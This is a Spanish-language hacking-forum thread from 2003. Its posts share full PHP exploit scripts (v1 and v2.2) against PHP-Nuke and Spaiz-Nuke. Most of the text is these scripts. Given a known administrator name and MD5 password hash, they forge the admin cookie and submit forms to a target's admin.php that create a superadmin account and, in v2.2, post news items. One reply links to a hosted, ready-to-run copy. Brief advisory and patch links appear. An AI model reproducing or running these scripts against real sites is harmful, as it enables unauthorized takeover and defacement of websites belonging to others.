Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: el-brujo en 10 Octubre 2003, 16:32 pm



Título: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: el-brujo en 10 Octubre 2003, 16:32 pm
Citar
exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP

blade ha escrito un exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP, lo ha probado con las versiones Oficiales de PHP-Nuke y funciona perfectamente :D.... Crea un administrador en el Portal vulnerable, a base de tener el nombre actual de el administrador y su password en MD5, un derivado del bug...


Código:
<?php
/*             PHP-Nuke & Spaiz-Nuke SQL Injection Exploit
                              By
            BBBBBBBB    lll    aaaaaaaa    ddddddd    eeeeeeeee
            BBBBBBBBB   lll    aaaaaaaaa  ddddddddde  eeeeeeeee
           BBBBBBBBBB  lll     aaaaaaaaad ddddddddde eeeeeeeeee
                  BBB  lll            aad         de
                  BBB  lll    aaaaaaaaaad        dde eeeeeeeeee
           BBBBBBBBBB  lll    aaaaaaaaaad ddd    dde eeeeeeeeee
          BBBBBBBBBB   lll    aaaaaaaaaa ddd     ddeeeeeeeeeeee
          BBBBBBBBBB  lll     aaa    aaa ddd    dddeeee
          BBB    BBB  lll     aaa    aaa ddd    ddd eee
          BBB   BBBB  lll    aaa     aaa ddd    ddd eee
          BBBBBBBBB   lllllllaaa         dddddddddd eeeeeeeeee
         BBBBBBBBB     llllllaaa        ddddddddddd  eeeeeeeee
         BBBBBBBB       lllll aa        dddddddddd    eeeeeee
                          <blade@abez.org>

|Blade «blade@abez.org»|
###www.abez.org Of AbeZ
##www.rzw.com.ar By XyborG
#www.fihezine.tsx.to Of FiH eZine
*/
 echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
      <title>PHP-Nuke &amp; Spaiz-Nuke Injection Exploit v1.0 By Blade</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
      .bginput  { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      A:link    { COLOR: #000066; TEXT-DECORATION: none }
      A:visited { COLOR: #000066; TEXT-DECORATION: none }
      A:active  { COLOR: #000066; TEXT-DECORATION: none }
      A:hover   { COLOR: #000066; TEXT-DECORATION: none }
      .button   { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      </STYLE></head><body>';
     
 if (($action == "go") and ($server) and ($add_name) and ($add_email) and ($add_aid)){

        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
       
 echo "<form name='add' method='get' action='http://" . $server . "/admin.php'>
       <input type='hidden' name='op' value='AddAuthor'>
       <input type='hidden' name='add_name' value='" . $add_name . "'>
       <input type='hidden' name='add_aid' value='" . $add_aid . "'>
       <input type='hidden' name='add_email' value='" . $add_email . "'>
       <input type='hidden' name='add_url' value='" . $add_url . "'>
       <input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
       <input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
       vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" .
       $hash . "</strong> . <br>New Administrator : <strong>" . $add_name . "</strong>.
       In case that these data are not correct he returns from
       <a href='javascript:history.back()'><strong>«Here»</strong></a>.</font>
       <br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
       continue la operacion agregando el nuevo Administrador.</b></font></center>
       <center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center>
       </form>";
                             
 } else {
 
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
      <input name="action" type="hidden" id="action" value="go">
      </font></strong></u></p>
      <div align="center">
      <TABLE width="65%" border=0 align="center" cellPadding=0 cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Servidor
      Vulneable:</font></strong></div></TD>
      </TR>
      <TR>
      <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
      Servidor:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" value="www.">
      </div></TD>
      </TR>
      <TR>
      <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
      Admin :</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_name" type="text" id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR>
      <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
          MD5:</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="50" class="bginput">
      </p></TD>
      </TR>
      </TABLE>
      <br>
      </div>
      <TABLE width="50%" border=0 align="center">
      <TBODY>
      <TR>
      <TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Datos
      de la Cuenta:</font></strong></div></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=50 size=30 name=add_name class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nickname:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=30 size=30 name=add_aid class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">E-Mail:</font></TD>
      <TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=60 size=30 name=add_email class="bginput">
      <FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60>
      <strong>
      <input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1">
      </strong> </font></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
      <FONT class=tiny><strong>(Obligatorio)</strong></FONT></font></TD>
      </TR>
      <INPUT type=hidden value=AddAuthor name=op>
      <TR>
      <TD>&nbsp;</TD>
      </TR>
      </TABLE>
      <div align="center">
      <p align="center">
      <INPUT name="submit" type=submit value="Crear Administrador" class="button">
      </p>
      </FORM>';
     
 } if ($action != "go"){
 
 echo'<div align="center"><u><font size="2" face="Verdana, Arial, Helvetica, sans-serif"></font></u></div>
      <table width="100%" border="0" align="center">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Como
      Usar: </strong></font></div><td>
      </tr>
      <tr>
      <td width="18%"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Direccion
      Servidor :</font></strong></td>
      <td width="82%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es
      la URL correspondiente al Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nombre
      Admin :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la identidad
      en valor de nombre, del administrador del cual se conoce el password cifrado.
      Ejemplo : xMan.</font></td>
      </tr>
      <tr>
     
    <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Password
      MD5 :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password
      cifrado en MD5 del administrador, cuyo nombre se conoce. Ejemplo: QmxhZGU6MWVhNTJmMjZlN2UwY2UwOGU0NjJmODdmNWUzNTA5NmM6</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nombre
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el nombre
      correspondiente al nuevo Administrador a crear. Ejemplo: BaxGo.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Nickname
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el Nick
      o Apodo, figurante para el nuevo administrador. Ejemplo: SysBack </font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;E-Mail
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el E-mail
      que figurar&aacute; en la nueva cuenta del Administrador. Ejemplo: sysback@phpnuke..com</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;URL
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la URL
      del Website del nuevo administrador. </font></td>
      </tr>
      <tr>
      <td height="14"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">&raquo;Password
      :</font></strong></td>
      <td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password,
      del cual el nuevo Administrador depender&aacute; para ingresar en su futura
      cuenta. </font></td>
      </tr>
      </table>
      <br>
      <div align="center">
      <table width="45%" border="0">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Referencias:</strong></font></div></td>
      </tr>
      <tr>
      <td width="47%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td width="53%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://rst.void.ru</a>
      </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Mas
      Informacion</strong> De :</font></div></td>
      <td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.securityfocus.com/archive/1/340664" target="_blank">http://www.securityfocus.com</a></font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
      Informacion De :</font></div></td>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
      </tr>
      </table>';

 }
       
 echo'<center><p><font color="#003366" size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="mailto:blade@abez.org"><strong><u>PHP-Nuke
      &amp; Spaiz-Nuke SQL Injection Exploit By Blade.</u></strong></a></font></p></center>
      </div>
      </body>
      </html>';
?>


+ Info
http://cyruxnet.com.ar/phpnuke_modules.htm



¿Cómo parchear?

http://www.phpsecure.info/


Otras:
http://www.securityfocus.com/bid/8764
http://www.securityfocus.com/bid/8798


Título: Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
Publicado por: Ambolius en 11 Octubre 2003, 04:05 am
Buenas...

Solo añadir que, aqui teneis el exploit ya hecho y listo para ser usado...

http://www.adictosnet.com.ar/nuke.php


Saludos


Título: Nueva Version Exploit PHP-Nuke...
Publicado por: Blade en 16 Octubre 2003, 19:50 pm
Buenas :D, gracias, queria publicaros la ultima version del exploit(v2.2), facilita otro apartado de la administracion, que permite agregar noticias... Ya no habrán mas por el tiempo etc... Aqui va el codigo: file: exploit.php
Código:
<?php
/*             PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2
                                   By
            BBBBBBBB    lll    aaaaaaaa    ddddddd    eeeeeeeee
            BBBBBBBBB   lll    aaaaaaaaa  ddddddddde  eeeeeeeee
           BBBBBBBBBB  lll     aaaaaaaaad ddddddddde eeeeeeeeee
                  BBB  lll            aad         de
                  BBB  lll    aaaaaaaaaad        dde eeeeeeeeee
           BBBBBBBBBB  lll    aaaaaaaaaad ddd    dde eeeeeeeeee
          BBBBBBBBBB   lll    aaaaaaaaaa ddd     ddeeeeeeeeeeee
          BBBBBBBBBB  lll     aaa    aaa ddd    dddeeee
          BBB    BBB  lll     aaa    aaa ddd    ddd eee
          BBB   BBBB  lll    aaa     aaa ddd    ddd eee
          BBBBBBBBB   lllllllaaa         dddddddddd eeeeeeeeee
         BBBBBBBBB     llllllaaa        ddddddddddd  eeeeeeeee
         BBBBBBBB       lllll aa        dddddddddd    eeeeeee
                           <blade@abez.org>

|Blade «blade@abez.org»|
****www.abez.org Of AbeZ
***www.rzw.com.ar By XyborG
**www.adictosnet.com.ar By LaKosa
*www.fihezine.tsx.to Of FiH eZine
*/
 echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
      <title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By Blade</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
      .bginput  { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      A:link    { COLOR: #000066; TEXT-DECORATION: none }
      A:visited { COLOR: #000066; TEXT-DECORATION: none }
      A:active  { COLOR: #000066; TEXT-DECORATION: none }
      A:hover   { COLOR: #000066; TEXT-DECORATION: none }
      .button   { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
      </STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636" vlink="#363636" alink="#d5ae83">
      <!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code By Blade<blade@abez.org> -->';

 if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email) and ($add_aid) and ($add_pwd)){
       
        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
       
 echo "<form name='add' method='post' action='http://" . $server . "/admin.php'>
       <input type='hidden' name='op' value='AddAuthor'>
       <input type='hidden' name='add_name' value='" . $add_name . "'>
       <input type='hidden' name='add_aid' value='" . $add_aid . "'>
       <input type='hidden' name='add_email' value='" . $add_email . "'>
       <input type='hidden' name='add_url' value='" . $add_url . "'>
       <input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
       <input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
       vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" .
       $hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name . "</strong>.
       En caso de que estos datos no sean correctos vuelva atras desde
       <a href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font>
       <br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
       continue la operacion agregando el nuevo Administrador.</b></font></center>
       <center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center>
       </form>";
           
 } elseif (($action == "goNews") and ($server) and ($subject) and ($hometext) and ($bodytext)){

        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
       
 echo "<form name='addNews' method='post' action='http://" . $server . "/admin.php'>
       <input name='op' type='hidden' id='op' value='PostAdminStory'>
       <input name='topic' type='hidden' id='topic' value='1'>
       <input name='catid' type='hidden' id='catid' value='0'>
       <input name='ihome' type='hidden' id='ihome' value='0'>
       <input type='hidden' name='subject' value='" . $subject . "'>
       <input type='hidden' name='hometext' value='" . $hometext . "'>
       <input type='hidden' name='bodytext' value='" . $bodytext . "'>
       <input type='hidden' name='acomm' value='" . $acomm . "'>
       <input type='hidden' name='automated' value='" . $automated . "'>
       <input type='hidden' name='day' value='" . $day . "'>
       <input type='hidden' name='month' value='" . $month . "'>
       <input type='hidden' name='year' value='" . $year . "'>
       <input type='hidden' name='hour' value='" . $hour . "'>
       <input type='hidden' name='min' value='" . $min . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center>
       <font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor vulnerable
       : <strong>http://" . $server . "</strong> . <br>
       Clave Hash : <strong>" . $hash . "</strong> . <br>
       Asunto de la Noticia: <strong>" . $subject . "</strong>. <br>
       La Noticia es: <strong>" . $hometext . "</strong>. <br>
       En caso de que estos datos no sean correctos vuelva atras desde <a href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font>
       <br>
       <br>
       <font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
       continue la operacion agregando la noticia.</b></font>
       </center>
       <center>
       <input name='AddSysop' type='submit' id='AddSysop' value='Agregar Noticia' class='button'>
       </center>
       </form>";
           
 } elseif($exploit == "news") {
 
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <TABLE width="50%" border=0 align="center" cellPadding=0 cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Servidor
      Vulnerable:</u></font></strong></div></TD>
      </TR>
      <TR>
      <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
      Servidor:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" value="www.">
      </div></TD>
      </TR>
      <TR>
      <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
      Admin :</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_name" type="text" id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR>
      <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
      MD5:</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="40" class="bginput">
      </p></TD>
      </TR>
      </TABLE><br>
      <table width="50%" border="0" align="center">
      <tr>
      <td><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Noticia:</u></font></strong></div></td>
      </tr>
      <tr>
      <td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
          <input name="action" type="hidden" id="action" value="goNews">
      Título</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">(Obligatorio)<strong>:<br>
      <input
      size=50 name=subject class="bginput">
      </strong></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Texto
      de la Noticia</strong>(Obligatorio)<strong>:<br>
      <textarea name=hometext rows=5 wrap=virtual cols=50 class="bginput"></textarea>
      </strong></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Texto
      Extendido</strong>(Obligatorio)<strong>:<br>
      <textarea name=bodytext rows=12 wrap=virtual cols=50 class="bginput"></textarea>
      </strong></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">¿Activar
      Comentarios para esta Noticia?<strong>&nbsp;&nbsp;
      <input type=radio checked
      value=0 name=acomm>
      Si&nbsp;
      <input type=radio value=1
      name=acomm>
      No</strong><strong></strong></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">¿Quieres
      programar esta historia?<strong>&nbsp;&nbsp;
      <input type=radio value=1
      name=automated>
      Si &nbsp;&nbsp;
      <input type=radio checked
      value=0 name=automated>
      No<br>
      <br>
      Día:
      <input name="day" type="text" id="day3" value="' . date(d) . '" size="4" class="bginput">
      Mes:
      <select name="month" id="select2" class="bginput">
      <option value="1">1</option>
      <option value="2">2</option>
      <option value="3">3</option>
      <option value="4">4</option>
      <option value="5">5</option>
      <option value="6">6</option>
      <option value="7">7</option>
      <option value="8">8</option>
      <option value="9">9</option>
      <option value="10">10</option>
      <option value="11">11</option>
      <option value="12" selected>12</option>
      </select>
      Año:
      <input maxlength=4 size=5 value="' . date(Y) . '" name=year class="bginput">
      <br>
      Hora:
      <select name=hour class="bginput">
      <option selected name="hour">00</option>
      <option name="hour">01</option>
      <option name="hour">02</option>
      <option name="hour">03</option>
      <option name="hour">04</option>
      <option name="hour">05</option>
      <option name="hour">06</option>
      <option name="hour">07</option>
      <option name="hour">08</option>
      <option name="hour">09</option>
      <option name="hour">10</option>
      <option name="hour">11</option>
      <option name="hour">12</option>
      <option name="hour">13</option>
      <option name="hour">14</option>
      <option name="hour">15</option>
      <option name="hour">16</option>
      <option name="hour">17</option>
      <option name="hour">18</option>
      <option name="hour">19</option>
      <option name="hour">20</option>
      <option name="hour">21</option>
      <option name="hour">22</option>
      <option name="hour">23</option>
      </select>
      :
      <select name=min class="bginput">
      <option
      selected name="min">00</option>
      <option name="min">05</option>
      <option name="min">10</option>
      <option name="min">15</option>
      <option name="min">20</option>
      <option name="min">25</option>
      <option name="min">30</option>
      <option name="min">35</option>
      <option name="min">40</option>
      <option name="min">45</option>
      <option name="min">50</option>
      <option name="min">55</option>
      </select>
      : 00</strong></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>
      <input name="submit" type=submit value="Agregar Noticia" class="button">
      </strong></font></div></td>
      </tr>
      </table><center><strong><font color="#000066" size="1" face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ Ver el exploit de los Administradores ]</a> </font></strong></center>';
                   
 } else {
 
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
      <input name="action" type="hidden" id="action" value="goAdmin">
      </font></strong></u></p>
      <div align="center">
      <TABLE width="50%" border=0 align="center" cellPadding=0 cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Servidor
      Vulnerable:</u></font></strong></div></TD>
      </TR>
      <TR>
      <TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
      Servidor:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" value="www.">
      </div></TD>
      </TR>
      <TR>
      <TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
      Admin :</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_name" type="text" id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR>
      <TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
      MD5:</font></strong></div></TD>
      <TD>&nbsp;</TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="40" class="bginput">
      </p></TD>
      </TR>
      </TABLE>
      <br>
      </div>
      <TABLE width="50%" border=0 align="center">
      <TBODY>
      <TR>
      <TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Datos
      de la Cuenta:</u></font></strong></div></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nombre:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=50 size=30 name=add_name class="bginput">
      (Obligatorio)</font></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nickname:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=30 size=30 name=add_aid class="bginput">
      (Obligatorio)</font></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>E-Mail:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT maxLength=60 size=30 name=add_email class="bginput">
      (Obligatorio)</font></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60>
      <strong>
      <input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1">
      </strong> </font></TD>
      </TR>
      <TR>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Password:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
      <INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
      (Obligatorio)</font></TD>
      </TR>
      <INPUT type=hidden value=AddAuthor name=op>
      </TABLE>    
      <div align="center">
      <INPUT name="submit" type=submit value="Crear Administrador" class="button">
      </div>
      </FORM><center><strong><font color="#000066" size="1" face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ Ver el exploit de la Noticias ]</a> </font></strong></center>';
     
 } if (($action == "goAdmin") or ($action == "goNews")){
 
 echo'';

 }if (($action != "goAdmin") and ($action != "goNews")){
 
 echo'<br><table width="100%" border="0" align="center">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Uso:</u></strong></font></div></td>
      </tr>
      <tr>
      <td width="15%"><strong><font size="1" face="Tahoma">&raquo;Direccion Servidor
      :</font></strong></td>
      <td width="85%"><font size="1" face="Tahoma">Es la URL correspondiente al
      Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Tahoma">&raquo;Nombre Admin :</font></strong></td>
      <td><font size="1" face="Tahoma">Es la identidad en valor de nombre, del administrador
      del cual se conoce el password cifrado. Ejemplo : xMan.</font></td>
      </tr>
      <tr>
      <td><strong><font size="1" face="Tahoma">&raquo;Password MD5 :</font></strong></td>
      <td><font size="1" face="Tahoma">Es el password cifrado en MD5 del administrador,
      cuyo nombre se conoce. Ejemplo: 1ea52f26e7e0ce08e462f87f5e35096c </font></td>
      </tr>
      </table><br><div align="center">
      <table width="45%" border="0" align="center">
      <tr>
      <td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Referencias:</u></strong></font></div></td>
      </tr>
      <tr>
      <td width="47%"><div align="center"><font size="1" face="Tahoma">Descubridores
      Bug :</font></div></td>
      <td width="53%"><div align="center"><font size="1" face="Tahoma"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://www.rst.void.ru</a>
      </font> <font size="1" face="Tahoma"></font></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Tahoma"><strong>Mas Informacion</strong>
      :</font></div></td>
      <td><div align="center"><strong><font size="1" face="Tahoma"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
      </tr>
      <tr>
      <td><div align="center"><font size="1" face="Tahoma">Mas Informacion :</font></div></td>
      <td><div align="center"><font size="1" face="Tahoma"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td>
      </tr>
      <tr>
      <td>
      <div align="center"><font size="1" face="Tahoma">Mas Informacion :</font></div></td>
